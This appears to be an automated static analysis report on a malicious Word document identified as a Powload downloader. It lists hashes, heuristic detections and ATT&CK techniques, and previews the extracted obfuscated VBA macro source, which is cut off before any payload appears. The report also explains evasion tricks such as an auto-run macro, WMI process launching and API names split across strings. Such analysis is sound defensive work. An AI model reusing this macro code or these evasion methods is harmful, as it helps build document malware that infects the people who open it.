Powload — Office (OLE) malware analysis

Static analysis result for SHA-256 5d161eab7ef2878e…

Verdict: MALICIOUS

File type: Office (OLE)

Size: 239.0 KB
Created: 2019-04-23 13:04:00
Authoring application: Microsoft Office Word
First seen: 2019-06-27

MD5: 497519dcb67c2b6e8d518386e37c4b0a
SHA-1: b67537419862600d034df32e1533a7531c2f220d
SHA-256: 5d161eab7ef2878e01833a5eaa610cb8512d10bb3606bcfdc1dfa486598fa093

Risk Score: 342

Malware Insights

Powload · confidence 95%

MITRE ATT&CK

  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1218.011 System Binary Proxy Execution: Rundll32

This document triggers the critical OLE_VBA_WMI_PROCESS_CREATE heuristic, indicating that VBA is used to launch a Win32_Process via WMI. The OLE_VBA_SPLIT_KEYWORD_OBFUSCATION finding on the token 'Win32_Process', together with the ClamAV detection 'Doc.Downloader.Powload-6953161-0', strongly suggests this is a Powload downloader variant. The autoopen macro is the entry point that executes this malicious functionality.

Heuristics (9)

  • ClamAV: Doc.Downloader.Powload-6953161-0 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Powload-6953161-0
  • VBA macros detected [medium, 5 related findings] OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA WMI Win32_Process launcher [critical] OLE_VBA_WMI_PROCESS_CREATE
    VBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions.
  • Dangerous API name reassembled from split string literals [critical] OLE_VBA_SPLIT_KEYWORD_OBFUSCATION
    VBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
  • AutoOpen macro [high] OLE_VBA_AUTOOPEN
    AutoOpen macro
  • GetObject call [high] OLE_VBA_GETOBJ
    GetObject call
  • VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence of the old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (channel: document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 57494 bytes
SHA-256: a8972673a7d8e06b537a4679ce0e2dde46944fb6286ae06a45a3d77234a44f7b

Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "dAU4DZ14"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "HA4CAA"
Attribute VB_Base = "0{0FE26576-35BC-4E90-8102-B56BC7978D84}{691730C0-B418-4EE1-B948-EC7D921E916E}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "aQBQ_AAA"
Attribute VB_Base = "0{1CCF411A-F19D-428E-B128-6E553A49C527}{8009BC2E-AD3C-4A51-9698-70D376D07231}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "tAAAQBD"
Sub autoopen()
   If aUcCAA = BAAAcBwQ Then
     zAGZDo = mADCA4 - QkUQ_AQA
       ElseIf b4GwAAQ = BBcxkAUA Then
      Select Case DUAXkZk
         Case 130717671
       fXwACDxA = 532690017 * J1QUAA / 94766113 * Hex(278321947 * Fix(O_BxAAUB / CStr(KGQABABD) * OQABAk - Fix(858227226)) - 485292790 * Round(BBACAA + Hex(u_4BBoB) / 493923429 - 510482471))
       wQxZoZQw = vAAQQA + rAkCkXAG * SUU4AAAU / Sqr(AABQDAc) / 405502097 - Hex(QcZUG4) + (748718389 / 24348995)
      End Select
End If
   If DxxoAGXk = o1kC_U Then
     MCAQZoZA = pUUAB1oQ - DZDoAAA
       ElseIf wBxXXQDc = GDQAUAD Then
      Select Case mBAUoDA
         Case 744981456
       CX_AZA = 233116574 * LUX14A / 393646717 * Hex(983144437 * Fix(wBDQAZB / CStr(IkAAAcAA) * OkABAB - Fix(817693743)) - 535025997 * Round(W_DAA4_ + Hex(cQACDAD) / 787469753 - 904432682))
       SCUox_ = KCDC1A + BxAXZBGk * IQCDQAk / Sqr(ZAXAUA) / 459475629 - Hex(XADZACAQ) + (269874574 / 225039103)
      End Select
End If
   If jGZDxD = IDUoCco Then
     IBw4AX1 = hZUAo4B4 - Jk41UcCA
       ElseIf z1DAAUx = VZXA1AZ Then
      Select Case ZDxD1DA
         Case 281164218
       ZAADoD = 733970469 * YAX4Qc / 286668584 * Hex(298925152 * Fix(QBwAUAA / CStr(B1Z_kQB) * GAQQUD - Fix(227236327)) - 620446010 * Round(MDcQQAA + Hex(SAAB_D) / 301284213 - 832542895))
       DAXxXAG = HoAQxBD1 + mGoAAAA * D_kQAXwG / Sqr(p4ko_BU) / 313076272 - Hex(lkAAAw) + (780191755 / 190643459)
      End Select
End If
sC4AkD
   If DUABokc_ = oBQAxA Then
     WCAA1Uc = TBAUk_ - MBBAxCAw
       ElseIf CwC1DD4U = XUwBko4A Then
      Select Case jkBCQAAA
         Case 426317759
       VZCAQAAZ = 688430743 * RADBDUAA / 323625214 * Hex(168529708 * Fix(ECAcQx_1 / CStr(wxAAC4) * UBDcQA4 - Fix(941519462)) - 693287796 * Round(OGUAQBC + Hex(bZw_Uww) / 327664038 - 917306731))
       P4QQBoDX = iAAoUAA + VcAXxA4 * bwAx4U / Sqr(vAoGAQAC) / 945263989 - Hex(fxAcxQGQ) + (560280688 / 401479997)
      End Select
End If
   If G4ABAQoD = IADAQ1 Then
     WAGABk = fAAAADk - CkAXoA1G
       ElseIf NADAB1_A = sAAAZA Then
      Select Case uAD4CAA
         Case 148254135
       dZU4GAcZ = 224997473 * j4AUAD / 13350506 * Hex(989180132 * Fix(kGBQU4Gc / CStr(Vo4ZwA) * lAcCUD1 - Fix(566146267)) - 45299687 * Round(MAAUABA + Hex(wAAQXQGA) / 3943870 - 555426987))
       rGAGAQ1_ = d__AAA + jUDUDAc * fUQBZxAU / Sqr(lADQADBA) / 882451017 - Hex(XUABAQG) + (445516118 / 294789188)
      End Select
End If
   If jAAAkAAD = bAGcAA Then
     cBGA_UQ = ucQQAAG - N4oAAAwA
       ElseIf fXwAAA = ECBZZA Then
      Select Case FAUwox
         Case 372298751
       iUACDZA = 654500460 * NGUAAQQ / 575488400 * Hex(693046026 * Fix(FABDwAAQ / CStr(rDQ_AcA) * jBcAA4U - Fix(566813156)) - 238361471 * Round(WGAA_c + Hex(H4AkAAA) / 287124950 - 953699704))
       d_BADA = jAADGBDA + BcCAA4B * hCZAAAck / Sqr(V_BDc4B) / 317075576 - Hex(OAA1AAA) + (295290448 / 833258115)
      End Select
End If
End Sub

Attribute VB_Name = "AGQCBD"
Function sC4AkD()
On Error Resume Next
   If rAAZcAA = hD_cAQD Then
     VBxA_1_ = lGG1GZGw - tAoAZAAQ
      
... (truncated)